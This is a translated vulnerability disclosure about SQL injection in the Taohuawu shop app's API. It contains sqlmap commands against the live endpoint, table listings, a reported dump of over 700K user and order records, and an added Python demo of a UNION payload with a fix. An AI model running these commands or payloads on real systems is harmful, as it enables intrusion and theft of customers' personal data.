
Vulnerability summary

Defect ID: wooyun-2015-0118734

Title: 桃花坞商城 (Taohuawu Mall) SQL injection vulnerability (700K user records + 300K order records + assorted administrator records)

Vendor: 桃花坞商城

Author: blackchef

Submitted: 2015-06-09 16:00

Fixed: 2015-07-27 13:48

Published: 2015-07-27 13:48

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Handed to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure timeline:

2015-06-09: Details sent to the vendor, awaiting vendor handling
2015-06-12: Vendor confirmed; details visible to the vendor only
2015-06-22: Details opened to core white hats and relevant domain experts
2015-07-02: Details opened to regular white hats
2015-07-12: Details opened to intern white hats
2015-07-27: Details opened to the public

Brief description:

An adult-products e-commerce site, with orders flying all over the place.

Details:

This is a vulnerability in the app client. The story: I was searching for the Nice client and this app came up as a recommended install; it honestly was not something I needed to install... and then I found this hole. The more I explain, the more it hurts, so straight to the PoC.
Databases

python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" --dbs


[00:15:46] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[00:15:46] [INFO] fetching database names
[00:15:46] [INFO] the SQL query used returns 6 entries
[00:15:46] [INFO] resumed: information_schema
[00:15:46] [INFO] resumed: easy_taodata
[00:15:46] [INFO] resumed: jp_taodata
[00:15:46] [INFO] resumed: oto
[00:15:46] [INFO] resumed: taodata
[00:15:46] [INFO] resumed: zhidao_taohwu
available databases [6]:
[*] easy_taodata
[*] information_schema
[*] jp_taodata
[*] oto
[*] taodata
[*] zhidao_taohwu


200-odd tables

python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" -D taodata --tables


Database: taodata
[203 tables]
+------------------------------+
| ecs_category_2014-04-25 |
| ecs_goods_2014-04-25 |
| ecs_goods_gallery_2014-04-25 |
| app_activity_goods |
| app_activity_time |
| app_android_category |
| app_article |
| app_article_category |
| app_article_label |
| app_article_reply |
| app_bar |
| app_bar_at |
| app_bar_blackfans |
| app_bar_category |
| app_bar_checkin |
| app_bar_collect |
| app_bar_comment |
| app_bar_comment20150107 |
| app_bar_fans |
| app_bar_img |
| app_bar_letter |
| app_bar_points_log |
| app_bar_power |
| app_bar_praise |
| app_channel |
| app_cpa_report |
| app_field_category |
| app_index_issue |
| app_index_issue_category |
| app_ios_category |
| app_open_apply |
| app_open_apply20140926 |
| app_recommend_download |
| app_show_accuse |
| app_show_collect |
| app_show_comment |
| app_show_field |
| app_show_img |
| app_show_praise |
| app_topic |
| app_user_idea |
| aws_answer |
| aws_question |
| drp_goods_attr |
| drp_goods_gallery |
| ecs_account_log |
| ecs_ad |
| ecs_ad_custom |
| ecs_ad_keywords |
| ecs_ad_keywords_click |
| ecs_ad_position |
| ecs_admin_action |
| ecs_admin_log |
| ecs_admin_message |
| ecs_admin_user |
| ecs_adsense |
| ecs_adv |
| ecs_adv_pic |
| ecs_affiliate_log |
| ecs_agency |
| ecs_app_goods |
| ecs_area_region |
| ecs_article |
| ecs_article_attr |
| ecs_article_cat |
| ecs_attribute |
| ecs_auction_log |
| ecs_auto_manage |
| ecs_back_goods |
| ecs_back_order |
| ecs_bonus_type |
| ecs_booking_goods |
| ecs_brand |
| ecs_card |
| ecs_cart |
| ecs_cat_filtrate_brand |
| ecs_cat_filtrate_price |
| ecs_cat_recommend |
| ecs_category |
| ecs_collect_goods |
| ecs_comment |
| ecs_comment_reply |
| ecs_coupon |
| ecs_coupon_log |
| ecs_crons |
| ecs_delivery_goods |
| ecs_delivery_order |
| ecs_email_list |
| ecs_email_sendlist |
| ecs_error_log |
| ecs_exchange_goods |
| ecs_express_log |
| ecs_favourable_activity |
| ecs_feedback |
| ecs_friend_link |
| ecs_goods |
| ecs_goods_activity |
| ecs_goods_adv_pic |
| ecs_goods_article |
| ecs_goods_attr |
| ecs_goods_cat |
| ecs_goods_copy |
| ecs_goods_gallery |
| ecs_goods_insale |
| ecs_goods_ios |
| ecs_goods_sales |
| ecs_goods_stock |
| ecs_goods_third |
| ecs_goods_third_meal |
| ecs_goods_type |
| ecs_group_goods |
| ecs_group_up |
| ecs_jiajiagou |
| ecs_keywords |
| ecs_lasting_ticket |
| ecs_link_goods |
| ecs_mail_send_log |
| ecs_mail_templates |
| ecs_member_price |
| ecs_message |
| ecs_mobile_adv_pic |
| ecs_nav |
| ecs_new2_page_issue |
| ecs_new_page_issue |
| ecs_order_360info |
| ecs_order_action |
| ecs_order_goods |
| ecs_order_info |
| ecs_order_info20150104 |
| ecs_order_info_extend |
| ecs_order_yhj |
| ecs_orderlog |
| ecs_outbound_goods |
| ecs_pack |
| ecs_package_goods |
| ecs_page_issue |
| ecs_pay_log |
| ecs_payment |
| ecs_plugins |
| ecs_postmoney_rule |
| ecs_promotion_cfg |
| ecs_qianggou |
| ecs_reg_extend_info |
| ecs_reg_fields |
| ecs_region |
| ecs_role |
| ecs_role_user |
| ecs_searchengine |
| ecs_sessions |
| ecs_sessions_data |
| ecs_sex_test |
| ecs_sex_test_log |
| ecs_shipping |
| ecs_shipping_area |
| ecs_shop_config |
| ecs_sms |
| ecs_snatch_log |
| ecs_stats |
| ecs_storage_goods |
| ecs_subscibe |
| ecs_suppliers |
| ecs_tag |
| ecs_tag_cat |
| ecs_tag_cat_relation |
| ecs_tag_relation |
| ecs_taocan |
| ecs_template |
| ecs_topic |
| ecs_topic_issue |
| ecs_user_account |
| ecs_user_address |
| ecs_user_bonus |
| ecs_user_direct_price |
| ecs_user_feed |
| ecs_user_gift_coupon |
| ecs_user_login_log |
| ecs_user_rank |
| ecs_users |
| ecs_virtual_card |
| ecs_volume_price |
| ecs_vote |
| ecs_vote_log |
| ecs_vote_option |
| ecs_wap_category |
| ecs_wholesale |
| erp_action_log |
| erp_admin |
| erp_permission |
| erp_project |
| erp_purchase |
| erp_purchase_detail |
| getbonus_log |
| ltb_session |
| stats_click |
| stats_goods |
| stats_order |
| stats_pv |
| stats_search_keys |
| stats_user_order |
| temp_Stat |
| temp_order |
| user_info |
| user_login_log |
+------------------------------+


760K users' phone numbers, passwords and other data

python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" -D taodata -T ecs_users -C user_name,password,user_id --dump  --charset=UTF-8


[00:43:28] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[00:43:28] [INFO] fetching columns 'password, user_id, user_name' for table 'ecs_users' in database 'taodata'
[00:43:28] [INFO] the SQL query used returns 3 entries
[00:43:28] [INFO] resumed: user_id
[00:43:28] [INFO] resumed: mediumint(8) unsigned
[00:43:28] [INFO] resumed: user_name
[00:43:28] [INFO] resumed: varchar(150)
[00:43:28] [INFO] resumed: password
[00:43:28] [INFO] resumed: varchar(32)
[00:43:28] [INFO] fetching entries of column(s) 'password, user_id, user_name' for table 'ecs_users' in database 'taodata'
[00:43:28] [INFO] the SQL query used returns 764045 entries


380K order records

python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" -D taodata -T ecs_order_info --dump -C consignee,address,mobile,user_id --charset=UTF-8


[00:45:24] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[00:45:24] [INFO] fetching columns for table 'ecs_order_info' in database 'taodata'
[00:45:24] [INFO] the SQL query used returns 101 entries
[00:45:24] [INFO] fetching entries for table 'ecs_order_info' in database 'taodata'
[00:45:24] [INFO] the SQL query used returns 388531 entries


Administrator data

python sqlmap.py -u "http://appsource.taohwu.com.cn/api_pj.php?appfun=getBarUserInfo&user_id=123" -D taodata -T ecs_admin_user --dump --charset=UTF-8


[00:49:00] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[00:49:00] [INFO] fetching columns for table 'ecs_admin_user' in database 'taodata'
[00:49:00] [INFO] the SQL query used returns 14 entries
[00:49:00] [INFO] resumed: user_id
[00:49:00] [INFO] resumed: smallint(5) unsigned
[00:49:00] [INFO] resumed: user_name
[00:49:00] [INFO] resumed: varchar(255)
[00:49:00] [INFO] resumed: email
[00:49:00] [INFO] resumed: varchar(255)
[00:49:00] [INFO] resumed: password
[00:49:00] [INFO] resumed: varchar(32)
[00:49:00] [INFO] resumed: add_time
[00:49:00] [INFO] resumed: int(11)
[00:49:00] [INFO] resumed: last_login
[00:49:00] [INFO] resumed: int(11)
[00:49:00] [INFO] resumed: last_ip
[00:49:00] [INFO] resumed: varchar(15)
[00:49:00] [INFO] resumed: action_list
[00:49:00] [INFO] resumed: text
[00:49:00] [INFO] resumed: nav_list
[00:49:00] [INFO] resumed: text
[00:49:00] [INFO] resumed: lang_type
[00:49:00] [INFO] resumed: varchar(50)
[00:49:00] [INFO] resumed: agency_id
[00:49:00] [INFO] resumed: smallint(5) unsigned
[00:49:00] [INFO] resumed: suppliers_id
[00:49:00] [INFO] resumed: smallint(5) unsigned
[00:49:00] [INFO] resumed: todolist
[00:49:00] [INFO] resumed: longtext
[00:49:00] [INFO] resumed: is_kf
[00:49:00] [INFO] resumed: tinyint(1)
[00:49:00] [INFO] fetching entries for table 'ecs_admin_user' in database 'taodata'
[00:49:00] [INFO] the SQL query used returns 15 entries

Proof of vulnerability:

User data

[screenshot: taohuawuyonghu.png]


Order data

[screenshot: taohuawudingdan.png]


Administrator data

[screenshot: taohuawuguanliyuan.png]


Suggested fix:

Fix it however you see fit.
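As an added example (editor's code, not the reporter's and not the vendor's source), the mechanism the sqlmap runs above automate, reduced to something that runs offline: a Python/sqlite stand-in for the api_pj.php getBarUserInfo handler with the user_id query-string value concatenated into the SQL text, a UNION payload that pulls ecs_users rows out through that endpoint (what --dump does at scale), the boolean-based blind probe sqlmap uses to recognise such a point, and a hardened handler that validates and binds the parameter. The table and column names come from the report; the handler bodies, the assumption that user_id sits in a numeric (unquoted) WHERE clause, the sample rows and the sqlite back end (MySQL in the real case) are all assumptions made for this example.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the MySQL "taodata" database the report
# enumerates. Table and column names are taken from the sqlmap output above;
# the rows are made up for this example. The 32-character password values
# only mimic the varchar(32) column type sqlmap reported.
SCHEMA = """
CREATE TABLE ecs_users    (user_id INTEGER PRIMARY KEY, user_name TEXT, password TEXT);
CREATE TABLE app_bar_fans (user_id INTEGER, nickname TEXT);
"""
SAMPLE_USERS = [
    (1, "13800000001", "0123456789abcdef0123456789abcdef"),
    (2, "13800000002", "fedcba9876543210fedcba9876543210"),
]
SAMPLE_FANS = [(123, "alice_fan"), (124, "bob_fan")]


def connect():
    """Build the sample database; returns an open sqlite3 connection."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO ecs_users VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.executemany("INSERT INTO app_bar_fans VALUES (?, ?)", SAMPLE_FANS)
    return conn


def get_bar_user_info_vulnerable(conn, user_id):
    """Hypothetical reconstruction of the appfun=getBarUserInfo handler: the
    raw user_id query-string value is concatenated into a numeric (unquoted)
    WHERE clause, which is what lets sqlmap enumerate the databases."""
    sql = "SELECT user_id, nickname FROM app_bar_fans WHERE user_id=" + user_id
    return conn.execute(sql).fetchall()


def get_bar_user_info_fixed(conn, user_id):
    """Hardened handler: reject anything that is not a plain decimal integer
    (re.fullmatch rather than str.isdigit, which also accepts Unicode digits
    such as '²' that int() then rejects) and bind the value as a parameter,
    so the SQL text never contains attacker-controlled characters."""
    if not re.fullmatch(r"[0-9]{1,10}", user_id):
        raise ValueError("user_id must be a decimal integer")
    sql = "SELECT user_id, nickname FROM app_bar_fans WHERE user_id=?"
    return conn.execute(sql, (int(user_id),)).fetchall()


# A UNION payload of the kind sqlmap's --dump issues: the injected SELECT has
# the same column count as the original query and pulls ecs_users rows out
# through the bar endpoint. The leading -1 matches no fan row, so only the
# leaked rows come back.
UNION_PAYLOAD = "-1 UNION SELECT user_id, password FROM ecs_users"


def leak_user_table(conn, handler=get_bar_user_info_vulnerable):
    """Send the UNION payload through a handler; returns whatever rows came back."""
    return handler(conn, UNION_PAYLOAD)


def is_blind_injectable(conn, handler, user_id):
    """Boolean-based blind probe, the check sqlmap runs before it dumps: the
    point is injectable if the baseline response equals the response with a
    true predicate appended and both differ from the false-predicate response.
    A handler that raises (validation error, SQL error) yields no usable
    difference for that probe and is treated as not injectable here."""
    def call(value):
        try:
            return handler(conn, value)
        except (ValueError, sqlite3.Error):
            return None

    baseline = call(user_id)
    true_case = call(f"{user_id} AND 1=1")
    false_case = call(f"{user_id} AND 1=2")
    return (baseline is not None and baseline == true_case
            and true_case != false_case)


if __name__ == "__main__":
    db = connect()
    print("vulnerable, normal request:", get_bar_user_info_vulnerable(db, "123"))
    print("vulnerable, UNION payload :", leak_user_table(db))
    print("blind probe, vulnerable   :", is_blind_injectable(db, get_bar_user_info_vulnerable, "123"))
    print("blind probe, fixed        :", is_blind_injectable(db, get_bar_user_info_fixed, "123"))
```

The fixed handler keeps both defences on purpose: the bound parameter is what actually stops injection, while the integer whitelist is cheap defence in depth and turns probe traffic into a clean 4xx-style rejection instead of a database error that itself leaks information.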

Copyright notice: when reposting, please credit the source as blackchef@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: Medium

Rank: 8

Confirmed: 2015-06-12 13:47

Vendor reply:

CNVD has confirmed the reported vulnerability; no direct handling channel with the organisation that operates the site has been established yet, so the report is awaiting claim.

Latest status:

None yet